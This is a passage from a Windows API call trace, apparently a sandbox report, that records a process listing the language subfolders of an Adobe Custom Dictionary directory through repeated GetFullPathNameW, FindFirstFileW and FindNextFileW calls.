lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", lpFilePart=0x0) returned 0x5c [0050.151] GetLastError () returned 0x12 [0050.151] SetErrorMode (uMode=0x1) returned 0x0 [0050.151] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.151] GetLastError () returned 0x12 [0050.151] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.151] GetLastError () returned 0x12 [0050.151] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.151] GetLastError () returned 0x12 [0050.151] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.151] SetErrorMode (uMode=0x0) returned 0x1 [0050.151] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", lpFilePart=0x0) returned 0x5c [0050.151] GetLastError () returned 0x12 [0050.151] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.151] GetLastError () returned 0x12 [0050.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.151] GetLastError () returned 0x12 [0050.151] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", lpFilePart=0x0) returned 0x5c [0050.151] GetLastError () returned 0x12 [0050.151] SetErrorMode (uMode=0x1) returned 0x0 [0050.151] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.151] GetLastError () returned 0x12 [0050.151] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.152] GetLastError () returned 0x12 [0050.152] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.152] GetLastError () returned 0x12 [0050.152] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.152] SetErrorMode (uMode=0x0) returned 0x1 [0050.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt", lpFilePart=0x0) returned 0x5c [0050.152] GetLastError () returned 0x12 [0050.152] SetErrorMode (uMode=0x1) returned 0x0 [0050.152] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.152] GetLastError () returned 0x12 [0050.152] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.152] GetLastError () returned 0x12 [0050.152] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.152] GetLastError () returned 0x12 [0050.152] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.152] SetErrorMode (uMode=0x0) returned 0x1 [0050.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", lpFilePart=0x0) returned 0x5c [0050.152] GetLastError () returned 0x12 [0050.152] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.152] GetLastError () returned 0x12 [0050.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.152] GetLastError () returned 0x12 [0050.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", lpFilePart=0x0) returned 0x5c [0050.152] GetLastError () returned 0x12 [0050.152] SetErrorMode (uMode=0x1) returned 0x0 [0050.152] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.152] GetLastError () returned 0x12 [0050.152] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.153] GetLastError () returned 0x12 [0050.153] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.153] GetLastError () returned 0x12 [0050.153] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.153] SetErrorMode (uMode=0x0) returned 0x1 [0050.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum", lpFilePart=0x0) returned 0x5c [0050.153] GetLastError () returned 0x12 [0050.153] SetErrorMode (uMode=0x1) returned 0x0 [0050.153] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rum\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.153] GetLastError () returned 0x12 [0050.153] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.153] GetLastError () returned 0x12 [0050.153] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.153] GetLastError () returned 0x12 [0050.153] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.153] SetErrorMode (uMode=0x0) returned 0x1 [0050.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", lpFilePart=0x0) returned 0x5c [0050.153] GetLastError () returned 0x12 [0050.153] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.153] GetLastError () returned 0x12 [0050.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.153] GetLastError () returned 0x12 [0050.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", lpFilePart=0x0) returned 0x5c [0050.153] GetLastError () returned 0x12 [0050.153] SetErrorMode (uMode=0x1) returned 0x0 [0050.153] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.153] GetLastError () returned 0x12 [0050.153] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.154] GetLastError () returned 0x12 [0050.154] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.154] GetLastError () returned 0x12 [0050.154] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.154] SetErrorMode (uMode=0x0) returned 0x1 [0050.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus", lpFilePart=0x0) returned 0x5c [0050.154] GetLastError () returned 0x12 [0050.154] SetErrorMode (uMode=0x1) returned 0x0 [0050.154] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\rus\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.154] GetLastError () returned 0x12 [0050.154] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.154] GetLastError () returned 0x12 [0050.154] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.154] GetLastError () returned 0x12 [0050.154] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.154] SetErrorMode (uMode=0x0) returned 0x1 [0050.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", lpFilePart=0x0) returned 0x5c [0050.154] GetLastError () returned 0x12 [0050.154] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.154] GetLastError () returned 0x12 [0050.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.154] GetLastError () returned 0x12 [0050.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", lpFilePart=0x0) returned 0x5c [0050.154] GetLastError () returned 0x12 [0050.154] SetErrorMode (uMode=0x1) returned 0x0 [0050.154] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.154] GetLastError () returned 0x12 [0050.154] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.154] GetLastError () returned 0x12 [0050.155] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.155] GetLastError () returned 0x12 [0050.155] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.155] SetErrorMode (uMode=0x0) returned 0x1 [0050.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr", lpFilePart=0x0) returned 0x5c [0050.155] GetLastError () returned 0x12 [0050.155] SetErrorMode (uMode=0x1) returned 0x0 [0050.155] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\sgr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.155] GetLastError () returned 0x12 [0050.155] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.155] GetLastError () returned 0x12 [0050.155] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.155] GetLastError () returned 0x12 [0050.155] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.155] SetErrorMode (uMode=0x0) returned 0x1 [0050.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", lpFilePart=0x0) returned 0x5c [0050.155] GetLastError () returned 0x12 [0050.155] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.155] GetLastError () returned 0x12 [0050.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.155] GetLastError () returned 0x12 [0050.155] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", lpFilePart=0x0) returned 0x5c [0050.155] GetLastError () returned 0x12 [0050.155] SetErrorMode (uMode=0x1) returned 0x0 [0050.155] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.155] GetLastError () returned 0x12 [0050.155] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.155] GetLastError () returned 0x12 [0050.155] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.156] GetLastError () returned 0x12 [0050.156] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.156] SetErrorMode (uMode=0x0) returned 0x1 [0050.156] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo", lpFilePart=0x0) returned 0x5c [0050.156] GetLastError () returned 0x12 [0050.156] SetErrorMode (uMode=0x1) returned 0x0 [0050.156] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slo\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.156] GetLastError () returned 0x12 [0050.156] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.156] GetLastError () returned 0x12 [0050.156] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.156] GetLastError () returned 0x12 [0050.156] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.156] SetErrorMode (uMode=0x0) returned 0x1 [0050.156] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", lpFilePart=0x0) returned 0x5c [0050.156] GetLastError () returned 0x12 [0050.156] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.156] GetLastError () returned 0x12 [0050.156] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", lpFilePart=0x0) returned 0x5c [0050.156] GetLastError () returned 0x12 [0050.156] SetErrorMode (uMode=0x1) returned 0x0 [0050.156] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.156] GetLastError () returned 0x12 [0050.156] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.156] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.156] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.157] SetErrorMode (uMode=0x0) returned 0x1 [0050.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv", lpFilePart=0x0) returned 0x5c [0050.157] GetLastError () returned 0x12 [0050.157] SetErrorMode (uMode=0x1) returned 0x0 [0050.157] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\slv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.157] GetLastError () returned 0x12 [0050.157] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.157] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.157] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.157] SetErrorMode (uMode=0x0) returned 0x1 [0050.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", lpFilePart=0x0) returned 0x5c [0050.157] GetLastError () returned 0x12 [0050.157] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.157] GetLastError () returned 0x12 [0050.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", lpFilePart=0x0) returned 0x5c [0050.157] GetLastError () returned 0x12 [0050.157] SetErrorMode (uMode=0x1) returned 0x0 [0050.157] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.158] GetLastError () returned 0x12 [0050.158] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.158] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.158] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.158] SetErrorMode (uMode=0x0) returned 0x1 [0050.158] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn", lpFilePart=0x0) returned 0x5c [0050.158] GetLastError () returned 0x12 [0050.158] SetErrorMode (uMode=0x1) returned 0x0 [0050.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.158] GetLastError () returned 0x12 [0050.158] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.158] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.158] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.158] SetErrorMode (uMode=0x0) returned 0x1 [0050.158] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", lpFilePart=0x0) returned 0x5c [0050.158] GetLastError () returned 0x12 [0050.158] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.158] GetLastError () returned 0x12 [0050.158] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", lpFilePart=0x0) returned 0x5c [0050.158] GetLastError () returned 0x12 [0050.158] SetErrorMode (uMode=0x1) returned 0x0 [0050.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.158] GetLastError () returned 0x12 [0050.158] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.159] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.159] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.159] SetErrorMode (uMode=0x0) returned 0x1 [0050.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd", lpFilePart=0x0) returned 0x5c [0050.159] GetLastError () returned 0x12 [0050.159] SetErrorMode (uMode=0x1) returned 0x0 [0050.159] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.159] GetLastError () returned 0x12 [0050.159] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.159] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.159] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.159] SetErrorMode (uMode=0x0) returned 0x1 [0050.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", lpFilePart=0x0) returned 0x5c [0050.159] GetLastError () returned 0x12 [0050.159] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.159] GetLastError () returned 0x12 [0050.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\tur", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: 